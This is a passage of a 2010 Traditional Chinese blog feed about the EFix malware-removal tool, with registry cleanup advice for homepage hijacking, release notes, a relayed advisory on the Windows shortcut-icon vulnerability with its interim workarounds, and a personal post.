style="font-size: small;"&gt;那WINDOWS SEARCH功能馬上失效，並且會有各種可能出現的小問題產生&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;同樣情形如果是{1f4de370-d627-11d1-ba4f-00a0c91eedba}直接刪除&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;那我的電腦相關的東西都會無法開啟&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;那碰到這種的要怎麼辦？&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;這邊就是要注意CLSID數值之後的值&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;以上面為例&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_CLASSES_ROOT\CLSID\&lt;span class="Apple-style-span" style="font-size: small;"&gt;{e17d4fc0-5564-11d1-83f2-00a0c90dc849}&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;\SHELL\開啟(O&amp;amp;)\Command&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;正常的系統來說&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{e17d4fc0-5564-11d1-83f2-00a0c90dc849}不應該帶有SHELL值的&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;所以刪除上面就是刪除&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_CLASSES_ROOT\CLSID\&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{e17d4fc0-5564-11d1-83f2-00a0c90dc849}&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;\&lt;span class="Apple-style-span" style="color: red;"&gt;SHELL&lt;/span&gt;之後的值&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;而不是&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_CLASSES_ROOT\CLSID\&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{e17d4fc0-5564-11d1-83f2-00a0c90dc849}整段刪除&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;同樣的正常數值在&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace這邊也不能隨便刪除&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;會建議到正常電腦去比對數值，正常的有就不要刪&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;這樣才是比較正確的做法&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;不然以現在的首頁綁架方式大多都是修改正常數值的值去綁的&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;照這篇新聞所說的直接將整個值砍掉.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;砍完是OK啦，系統也差不多掛了吧.....&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;---------------------------------------------------&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;以上如果看不懂？ 那跑EFIX吧...&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;使用EFIX的IERESET::腳本可以清掉目前比較常見的數值修改&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;但除了這樣以外還要注意其他像是被修改的捷徑&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;捷徑關聯是否被修改&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;或者是另外有惡意程式監控數值反覆修改等&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;總之並沒有那麼簡單就是.雖然清除也不困難啦....&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;-----------------------------------------------------&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;在不懂？&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;那請人幫你處裡吧...這種東西沒事不要隨便亂動，不然沒備份死系統是會想哭的.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4115628827921486285?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4115628827921486285'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4115628827921486285'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/blog-post_29.html' title='[新聞] 中國變種木馬 綁架桌面捷徑'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5368886765390841666</id><published>2010-07-28T11:34:00.000+08:00</published><updated>2010-07-28T11:34:45.734+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.7 20100728.06</title><content type='html'>版本： 5.7 20100728.06&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1525001 bytes&lt;br /&gt;MD5...: c11202947b351f8fb5ffb55776f13910&lt;br /&gt;SHA1..: 67a6dab848a8b13ef036edd3cbf6e6b93b532260&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 X86&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正檔案關聯性列舉問題&lt;br /&gt;修正APPINIT_DLLS不列舉問題&lt;br /&gt;修正IERESET::腳本參數可能造成的部分CLSID遺失問題&lt;br /&gt;修正SERVICE列舉SVCHOST.EXE路徑錯誤問題&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5368886765390841666?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5368886765390841666'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5368886765390841666'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-57-2010072806.html' title='EFix 5.7 20100728.06'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-70164439858882257</id><published>2010-07-23T20:57:00.000+08:00</published><updated>2010-07-23T20:57:44.140+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>為何才發布三天就說已過期？</title><content type='html'>20100720.05這一版前面有提到過自動更新有問題&lt;br /&gt;&lt;br /&gt;問題就在偵測自動更新偵測到更新時就會顯示檔案過期...0rz&lt;br /&gt;所以才會顯示已過期&lt;br /&gt;&lt;br /&gt;0723.04這一版已修正。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-70164439858882257?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/70164439858882257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/70164439858882257'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/blog-post_23.html' title='為何才發布三天就說已過期？'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4108733449914625841</id><published>2010-07-23T16:18:00.000+08:00</published><updated>2010-07-23T16:18:29.176+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>EFix 5.7 20100723.04</title><content type='html'>版本：5.7 20100723.04&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1619148 bytes&lt;br /&gt;MD5...: def4034a372cdcf6bffe4d0ec901241b&lt;br /&gt;SHA1..: 6547345225869ebb4739fed308df8aa51b52b60a&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows 7 X86&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正自動更新的問題&lt;br /&gt;新增刪除檔案&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-4108733449914625841?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4108733449914625841'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/4108733449914625841'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-57-2010072304.html' title='EFix 5.7 20100723.04'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-727111877690363747</id><published>2010-07-22T20:39:00.000+08:00</published><updated>2010-07-22T20:39:53.851+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>新的攻擊手法</title><content type='html'>目前是還沒有在台灣有看到過。&lt;br /&gt;&lt;br /&gt;不過既然新聞稿發那麼大並且也有實際的樣本出現了&lt;br /&gt;那就大概提一下&lt;br /&gt;&lt;br /&gt;這一個攻擊手法就目前來說也有透過隨身碟&lt;br /&gt;但危害度比以往的AUTORUN.INF和偽裝資料夾要危險多了&lt;br /&gt;&lt;br /&gt;轉貼PTT&amp;nbsp;KarasuTW所提供的資料&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;微軟正在調查一起針對 Windows 殼層弱點進行的侷限且針對性的攻擊&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;攻擊者利用變造的捷徑檔，令目標系統在顯示出捷徑指定的圖示的時候&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;執行任意程式碼，攻擊者將獲得與目前本地使用者相當的權限。&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;攻擊案例：在隨身碟內植入帶有惡意程式的檔案 (應該可以是任意副檔名)&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;然後在根目錄植入特製捷徑檔，一待使用者瀏覽此隨身碟的根目錄&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;顯示出該捷徑檔的圖示時，惡意程式隨即執行。&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;亦可利用共享資料夾進行此攻擊。&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;影響範圍：WinXP SP3 ~ Win7、Win 2003 SP2 ~ Win 2008 R2 均受影響&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;是的，就目前的所有主流Windows全部躲不過&lt;br /&gt;但更危險的是他並不需要使用者點擊或透過特殊方式進行攻擊&lt;br /&gt;他只要使用者有開那個惡意程式所在的資料夾並且看到圖示就直接進行攻擊&lt;br /&gt;&lt;br /&gt;簡單說就是看到圖就中啦...&lt;br /&gt;就和你走在路邊看到一隻會咬人的狗，你只是經過看到他而已結果就被他咬這樣..&lt;br /&gt;&lt;br /&gt;目前這一篇發佈的時候微軟還沒有提供相關的安全性更新進行修正&lt;br /&gt;可能再等幾天吧....&lt;br /&gt;&lt;br /&gt;目前的暫時處理方式&lt;br /&gt;同樣轉貼PTT&amp;nbsp;KarasuTW所提供的資料&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;應變方案：&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;1. 停止為捷徑檔顯示指定的圖示：&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;將 HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler 預設值的資料清空&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;然後重開機或是重啟 explorer.exe&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;此選項的影響是所有捷徑都會顯示系統內建的統一圖示。&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;2. 停止 WebClient 服務&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;將 WebClient 啟動類型改為已停用，並停止 WebClient 服務運作&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;WebDAV 和所有明示依賴 WebClient 服務的應用程式都將無法運作。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;這兩種都是暫時的解決方案&lt;br /&gt;這邊EFIX不會增加項目做處理，因為這只是暫時性方案而已&lt;br /&gt;只是以很多人不喜歡更新這一點來說&lt;br /&gt;勢必需要做一個提示上去就是.&lt;br /&gt;&lt;br /&gt;目前手頭上也看到樣本了，感謝AVPCLUB Upside提供&lt;br /&gt;不過由於目前沒看到相關感染案例，所以並不會馬上加到清單內&lt;br /&gt;等真的有碰到再說....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-727111877690363747?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/727111877690363747'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/727111877690363747'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/blog-post_22.html' title='新的攻擊手法'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3198255988311314102</id><published>2010-07-20T13:39:00.000+08:00</published><updated>2010-07-20T13:39:33.639+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>自動更新又寫壞了...0rz</title><content type='html'>這一次是沒寫好...我的疏忽0rz&lt;br /&gt;&lt;br /&gt;順便說明一下好了&lt;br /&gt;&lt;br /&gt;EFIX的自動更新機制會做三個檢查&lt;br /&gt;第一個是版本更新檢查&lt;br /&gt;第二個是版本過舊檢查&lt;br /&gt;第三個是嚴重BUG檢查&lt;br /&gt;&lt;br /&gt;第一個就是連網路檢查有沒有新的版本，有就下載比對，下載失敗或者是&lt;br /&gt;不想要下載還可以繼續執行.&lt;br /&gt;&lt;br /&gt;第二個和第一個的差別是，檢查到版本過舊時會跳出提示說已過期&lt;br /&gt;假設不更新的話就會直接停止繼續執行不動作.&lt;br /&gt;&lt;br /&gt;第三個是當檢查到有嚴重BUG時會馬上停止執行並自我銷毀.&lt;br /&gt;&lt;br /&gt;到目前為止第三個是還沒有用到過.&lt;br /&gt;&lt;br /&gt;第一和第二個這幾次改版都寫不好0rz&lt;br /&gt;常常只顧東顧不到西的，加上AUTOIT改版之後的語法有變動&lt;br /&gt;我到上上個星期才發現到....0rz&lt;br /&gt;&lt;br /&gt;所以之前的自動更新功能一直出問題，當然和空間也有關.&lt;br /&gt;&lt;br /&gt;這個以後再慢慢修正，目前還有很多需要處裡的...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3198255988311314102?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3198255988311314102'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3198255988311314102'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/0rz_20.html' title='自動更新又寫壞了...0rz'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6053897767880890460</id><published>2010-07-20T11:53:00.000+08:00</published><updated>2010-07-20T11:53:38.947+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>EFix 5.7 20100720.05</title><content type='html'>版本：5.7 20100720.05&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1621436 bytes&lt;br /&gt;MD5...: e4078f310370ecbafa39fe827e3fb043&lt;br /&gt;SHA1..: 44d080914bee7d151416fa69103e3e01d93b61e2&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 X86&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加刪除檔案&lt;br /&gt;加強一點首頁綁架預設處理的能力&lt;br /&gt;修改小部分自動腳本結構&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;這兩天身體還是很不舒服...0rz&lt;br /&gt;所以就不弄太多東西了.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6053897767880890460?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6053897767880890460'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6053897767880890460'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-57-2010072005.html' title='EFix 5.7 20100720.05'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3983744553342769518</id><published>2010-07-16T05:50:00.000+08:00</published><updated>2010-07-16T05:50:11.149+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>靠么...昨天差點掛在路邊</title><content type='html'>是真的差點掛掉...0rz&lt;br /&gt;&lt;br /&gt;昨天照慣例騎車去接女朋友的時候結果突然發生全身發麻的情形&lt;br /&gt;並有呼吸困難的情形發生&lt;br /&gt;後來稱到我女朋友公司的時候叫我女朋友叫計程車到了急診&lt;br /&gt;&lt;br /&gt;結果是呼吸過度？&lt;br /&gt;我自己是完全沒有任何感覺呼吸過度的情形&lt;br /&gt;不過似乎是這樣...結果打了醫生開的鎮定劑之後&lt;br /&gt;過沒多久就好了&lt;br /&gt;不過還真的是有鎮定感...走路都東倒西歪的&lt;br /&gt;&lt;br /&gt;這個時候會覺得有女朋友真好QQ&lt;br /&gt;&lt;br /&gt;不過有另一半的人要注意&lt;br /&gt;除了要保護自己心愛的另一半以外&lt;br /&gt;自己也要多保護好自己，也要多體諒自己的另一半&lt;br /&gt;&lt;br /&gt;昨天在急診室的時候有碰到一個年輕小妹妹出車禍&lt;br /&gt;哭得很慘，除了傷痛以外也一直提到他害死她男友&lt;br /&gt;&lt;br /&gt;因為她男友掛了.....&lt;br /&gt;後來聽我女朋友說那個小妹妹似乎是要求她男朋友接她&lt;br /&gt;結果他男朋友就在載她騎車時打瞌睡...結果就是摔車&lt;br /&gt;後來就是這樣....&lt;br /&gt;&lt;br /&gt;我每次去急診室真的會常常碰到這種有的沒的事情&lt;br /&gt;這一次還真的是讓人覺得蠻悲哀的....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3983744553342769518?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3983744553342769518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3983744553342769518'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/blog-post.html' title='靠么...昨天差點掛在路邊'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5444518929067205463</id><published>2010-07-13T23:19:00.001+08:00</published><updated>2010-07-13T23:38:08.667+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.7 20100713.09</title><content type='html'>版本：5.7 20100713.09&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1541659 bytes&lt;br /&gt;MD5...: 7f1101f43b09792a4cb6e6ff8e8bb456&lt;br /&gt;SHA1..: 93c43907bd083ce70cd01f6263141ea282ca0630&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 x86旗艦版&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;這個就是上一篇說的應該要放上來的版本...&lt;br /&gt;新增腳本參數&lt;br /&gt;ENABLE AUTORUN:: 開啟關閉的自動執行功能 ( 如果是使用EFix 5.x版關閉的話.. )&lt;br /&gt;DISABLE AUTORUN:: 關閉自動執行功能 ( 使用鎖HKCU\...MOUNTPOINT2權限的方式 )&lt;br /&gt;LNKFILE RESET:: 還原HKCR\LNKFILE登錄值，對應首頁綁架用的&lt;br /&gt;&lt;br /&gt;腳本做一些微調。&lt;br /&gt;新增刪除檔案&lt;br /&gt;&lt;br /&gt;去除腳本參數EXTRA::&lt;br /&gt;那真的沒甚麼用..0rz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;基本上修改已經大致完成，看後續如何再決定是否要做最後的修改。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5444518929067205463?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5444518929067205463'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5444518929067205463'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-57-2010071309.html' title='EFix 5.7 20100713.09'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5170306117106020699</id><published>2010-07-13T09:40:00.000+08:00</published><updated>2010-07-13T09:40:06.841+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.7 20100712.05</title><content type='html'>版本：5.7 20100712.05&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1528963 bytes&lt;br /&gt;MD5...: 31bde4a441f8a74dada02366bb1a4e86&lt;br /&gt;SHA1..: 861e36082abfabdb01d64a52dd4c6b7306edd5e9&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows 7 x86 (旗艦版)&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;新增第三方工具REG.EXE和PRE.EXE&lt;br /&gt;前半段批次腳本做大幅更改&lt;br /&gt;GUI介面有變動請注意&lt;br /&gt;修正部分人匯入登錄值會失效的問題&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;........放錯了0rz&lt;br /&gt;我似乎上傳到還沒修改完全的版本&lt;br /&gt;不過原本要放的版本只有介面多一點東西而已所以沒差就算了先發佈&lt;br /&gt;原本要發的版本下一次再發。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5170306117106020699?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5170306117106020699'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5170306117106020699'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/07/efix-57-2010071205.html' title='EFix 5.7 20100712.05'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4878907243384110672</id><published>2010-07-08T17:58:00.000+08:00</published><updated>2010-07-08T17:58:51.989+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.6 20100708.02</title><content 